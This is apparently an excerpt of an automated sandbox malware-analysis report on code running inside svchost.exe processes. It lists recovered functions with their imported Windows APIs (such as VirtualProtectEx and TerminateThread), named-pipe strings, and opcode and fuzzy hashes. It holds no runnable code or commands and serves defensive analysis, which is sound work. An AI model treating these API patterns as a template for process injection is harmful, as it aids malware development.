PathFindFileNameW.SHLWAPI ref: 000002062E991A67
lstrlenW.KERNEL32 ref: 000002062E991A73
StrCpyW.SHLWAPI ref: 000002062E991A86
CloseHandle.KERNEL32 ref: 000002062E991A94

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 2be0fa7813b12ba2bda0db533642db08f3bb14fc4fb64904e212c21197df3a26
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: F4018021B00B419AEB10DB92A45C35D63A1FB88FC1F488036CE8947B55DE3CC9D5C700

Function 000002062E9937AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002062E9937C8
GetCurrentProcess.KERNEL32 ref: 000002062E9937D6
VirtualProtectEx.KERNEL32 ref: 000002062E9937F8
GetCurrentProcess.KERNEL32 ref: 000002062E993819
VirtualProtectEx.KERNEL32 ref: 000002062E99383A
TerminateThread.KERNEL32 ref: 000002062E993849

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 01d168f49dd5bea3422004a5a126739df96328e5af590aac35dc9c8815c7b8bb
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 94112D65E517409EFB24DBA2E41D75A67B4BF49B81F044436CD4907756EF3CC4A8C701

Function 000002062E9990F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002062E999103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002062E999198
RtlUnwindEx.NTDLL ref: 000002062E9991E7

Strings

csm, xrefs: 000002062E99917E
f, xrefs: 000002062E999116

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 93aac194cfb8c75dab582a315c7fa09fa104a7566f989577dfbcfa11d5d3d2da
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 23518932A127008EEB28DBA5E44CB5D3799F745B98F51C132DE1A4778AEB35D8E1C700

Function 000002062E9990D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002062E999103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002062E999198
RtlUnwindEx.NTDLL ref: 000002062E9991E7

Strings

csm, xrefs: 000002062E99917E
f, xrefs: 000002062E999116

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 4b70c15f4fa7f79e0c408bdfc6c80739a533498712e7960fb427e5d2eb1139f8
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 3231E032A017409EE724DF95E84C71D37A5F744B88F45C126AE4A03786CB39C9A0C705

Function 000002062E991AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002062E991AD8
StrCmpNIW.SHLWAPI ref: 000002062E991AF2
lstrlenW.KERNEL32 ref: 000002062E991B01
StrCpyW.SHLWAPI ref: 000002062E991B16

Strings

\\?\, xrefs: 000002062E991AE6

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: ae1a2eb8a39b5d9ce49c914660644284c5c4e858d7e684e97d1390ced2206368
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 70F04F62B047419AEB60CBA1F49C35D6761FB54B88F848032CE4947A5ADE6CC6E8CB00

Function 000002062E993200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002062E993222
StrCpyW.SHLWAPI ref: 000002062E993232
StrCatW.SHLWAPI ref: 000002062E99323E
PathCombineW.SHLWAPI ref: 000002062E99324C

Strings

\\.\pipe\, xrefs: 000002062E993218

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 1f5dc05d92b52fa521e3c4e9e897f5f219d7a9ca0789790de40d8ab102901e6b
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 07F0A720F04B8096EA00CF93B90C11DA662FF48FD0F088132DE5A07B2ACE2CC4E18301

Function 000002062E99A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002062E99A154
GetProcAddress.KERNEL32 ref: 000002062E99A16A
FreeLibrary.KERNEL32 ref: 000002062E99A187

Strings

mscoree.dll, xrefs: 000002062E99A14B
CorExitProcess, xrefs: 000002062E99A163

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: f47ae11d15147f754de2622435fd4184ef331ebcd37596e5038216ea3207978b
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: B9F0F861F61B449AEF589BE0E88C3692360EF88B90F44643B9D0B46666DF68C4E8C701

Function 000002062E9951B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002062E995236

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 5be877ce238eeb786ad2d1f4633c801ab0fc5e84e31aa89b884a61b160ec9b31
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 5102BA32619B808AE760CB95F49835FB7A0F3C5794F104126EA8E87BA9DF7DC494CB11

Function 000002062E9A0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002062E9A08A2
GetConsoleMode.KERNEL32 ref: 000002062E9A0960
GetLastError.KERNEL32 ref: 000002062E9A09EA

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 437fe03500c00a12770e9434289bd05a144b411530179f0436fad4dd212a249a
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0F819E22E507109DFB509FE5989C3AD67A1FB48B98F444137DE4A537D3DA3888E1C312

Function 000002062E9957F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002062E995806

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: dfc3fda78e3c3a5a8ebc8a0493155441c850363918ccfb269de596d921e00b82
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: CA61C936919B40CEE7609B9AF45C35BB7A0F388744F504126EE8D47BA9DB7CC5A0CB11

Function 000002062E9A1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002062E9A1EE0
_set_statfp.LIBCMT ref: 000002062E9A1EFB
_set_statfp.LIBCMT ref: 000002062E9A1F17
_set_statfp.LIBCMT ref: 000002062E9A1F53

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 0d013929d2fc01c49af3709a4d72665a890f396a13d74d2487f92af503381d35
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: FC11C6A2ED4B8009FB9811E6E45E3651040EF64374F690637BE7A073E78B148CE14927

Function 000002062E9712B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002062E9712E0
_set_statfp.LIBCMT ref: 000002062E9712FB
_set_statfp.LIBCMT ref: 000002062E971317
_set_statfp.LIBCMT ref: 000002062E971353

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: d593c884cdad9b8a58ebcefe086419b366ac480cab675c5c8096d07e54230568
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4711C6B2E54F010BF7A811E7E85E36921416B54774F580637AE760EBDF8A188CE94924

Function 000002062E993878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002062E993886
GetCurrentProcess.KERNEL32 ref: 000002062E9938B4
VirtualProtectEx.KERNEL32 ref: 000002062E9938D6
GetCurrentProcess.KERNEL32 ref: 000002062E9938F4
VirtualProtectEx.KERNEL32 ref: 000002062E993915

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 2f177fc6dc58f9b08096b549afb8aedf996d3e83e028aca1593f5606a4202b2a
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: D8110C2AF05B418AEB14DB92F40C36AA6B4FB49B84F04403ADE8907795EF3DC595C704

Function 000002062E9684F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002062E968503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002062E968598

Strings

f, xrefs: 000002062E968516
csm, xrefs: 000002062E96857E

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: d531e2f1c45a7bbd487d0db5be367f5b2065a093dc0d6c766cca34174e5ddc34
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 4C51BD72A127028EEB24CF65E44CB183395F344B98F558137DE4A4778ADB34C8E18B84

Function 000002062E9684D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002062E968503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002062E968598

Strings

f, xrefs: 000002062E968516
csm, xrefs: 000002062E96857E

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 4e977dec5218ecf359544d97d48ed164ad8c0813c280cdb0d1af93699e38bf9a
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 56319FB2A117419EE724DF51E84C71D37A4F744BD8F158027AE9A0778ACB38C9A1CB84

Function 000002062E9914B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002062E9914D5
HeapFree.KERNEL32 ref: 000002062E9914E4
GetProcessHeap.KERNEL32 ref: 000002062E9914F0
HeapFree.KERNEL32 ref: 000002062E9914FF
GetProcessHeap.KERNEL32 ref: 000002062E99152A

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: b5939dabb0458dbc2de506d2b87b412f3572ef117f48e0f1044aa7d7eef8162b
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 5E111C35A14B88DAE754DFA6A84C21EB360F789B84F04812ADF8A03766DF38C0A18741

Function 000002062E9926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002062E9927D4
StrCpyW.SHLWAPI ref: 000002062E9927ED

Strings

\\.\pipe\, xrefs: 000002062E9927DF

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: daa3a5924f6815d656f09c46df783ee4e4029e6971cce2666e4d33aef15da068
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 1571D232A047818EEB74DFA6A95C3EE6790F745B84F448037DE4D47B8ADE34C6A48740

Function 000002062E9924DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002062E9925C3
StrCpyW.SHLWAPI ref: 000002062E9925DA

Strings

\\.\pipe\, xrefs: 000002062E9925CE

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: cae12d7e1099a421abbe5b15d9120c699189a69d7c38d3275e88a7a3d35b4a47
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: A551D432A087818EE774DEA9B55C36E6791F785780F058037CE8E43F9BDA36C4A18B40

Function 000002062E9A0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002062E9A071B
GetLastError.KERNEL32 ref: 000002062E9A073D

Strings

U, xrefs: 000002062E9A06C7

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 41ebebd648b2ee4c8ea92f1e937a58a412141d27c73c1ade7fd4fab74e117cb5
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 3E41A372B15B4089EB20DF65E84C3AAB7A0F788784F414136EE4D87799DB3CC591CB41

Function 000002062E99D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002062E99D6F9
LCMapStringW.KERNEL32 ref: 000002062E99D781

Strings

LCMapStringEx, xrefs: 000002062E99D6DC, 000002062E99D6ED

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 05c5469eb4f631fcb3c0ce696c6a25b27284290e9b590bc51f4893adad80dda1
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 75111D36A08B808AD760CB55F48829AB7A4F7C9B94F544126EE8D43B5ADF38D590CB00

Function 000002062E9994A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002062E9994E8
RaiseException.KERNEL32 ref: 000002062E99952E

Strings

csm, xrefs: 000002062E99951B

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 82a4204cf96e42eebe6f16e145e46fb55ced3de89222193982e99f16e3f03f54
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 62112136A18B808AEB618F55F44835E77A5F788B98F588221DF8D07B65DF3CC5A5CB00

Function 000002062E99D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002062E99D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002062E99D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002062E99D681

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: d1c6e87ef7b7e598e4f5f8eb753bedbdc69bc87d83c0b6f344d576f24ed020a5
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: EBF0EC21F10B808AFB049BC6F88C2982361EF88B80F488037AE4903B16CF38D8F4C701

Function 000002062E99D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002062E99D631
TlsSetValue.KERNEL32 ref: 000002062E99D648

Strings

FlsSetValue, xrefs: 000002062E99D61E

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 160aba942230f6363dc2e2669b59d545325a8fa9f8a0c15d6cc390e2aa6428f4
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 20E06D61E4074099EA048BE4F84C6986362AF89B80F488037DD0906357CE38D8F5C702

Function 000002062E96CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002062E96CBC5

Strings

November, xrefs: 000002062E96CBA8, 000002062E96CBB2
October, xrefs: 000002062E96CBBE

Memory Dump Source

Source File: 00000021.00000002.1988921290.000002062E960000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e960000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: f5c0fe56acb5fed886d042d990c6111fdb183e7f0ffb57ac3c6e303f1ee0442e
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 0AE092A1E007429AFB05ABD1F44C3E423219BA8780F695033AD190A653CE38D8FAC380

Function 000002062E991D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002062E991D9B
HeapAlloc.KERNEL32 ref: 000002062E991DAA
GetProcessHeap.KERNEL32 ref: 000002062E991E1E
HeapFree.KERNEL32 ref: 000002062E991E2C

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 809c81511404cc6b2684d811f0d348507f03693b5972c07e9ce3934570f52763
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 77217922A05B90C9EB15CFAAE40C25AF3A0FB84B94F558126DE8D47B15EF78C5D68710

Function 000002062E991274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002062E99127A
HeapAlloc.KERNEL32 ref: 000002062E991289
GetProcessHeap.KERNEL32 ref: 000002062E9912A3
HeapAlloc.KERNEL32 ref: 000002062E9912B4

Memory Dump Source

Source File: 00000021.00000002.1988995272.000002062E990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002062E990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_2062e990000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: e9864938dbbea2c5c818881d2de22183327d9a813204e20ba3fe1317cd58224d
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 05E0C271E51B00CAE708DBA6D81C35A76E1EB88B51F49C025CD4907361DF7D84EACB91

Analysis Process: svchost.exePID: 356, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	59
Total number of Limit Nodes:	4

Executed Functions

Function 00000282B8DA1274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000282B8DA127A
HeapAlloc.KERNEL32 ref: 00000282B8DA1289
GetProcessHeap.KERNEL32 ref: 00000282B8DA12A3
HeapAlloc.KERNEL32 ref: 00000282B8DA12B4

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 17184550e73a38b46be2d7019034466f4c18151695b38dab96d002728540950b
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 6FE06DB5613641C6E7088F72D80834937E5FB88F85F48C024C90D07750DF7D8499D740

Function 00000282B8DA3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule
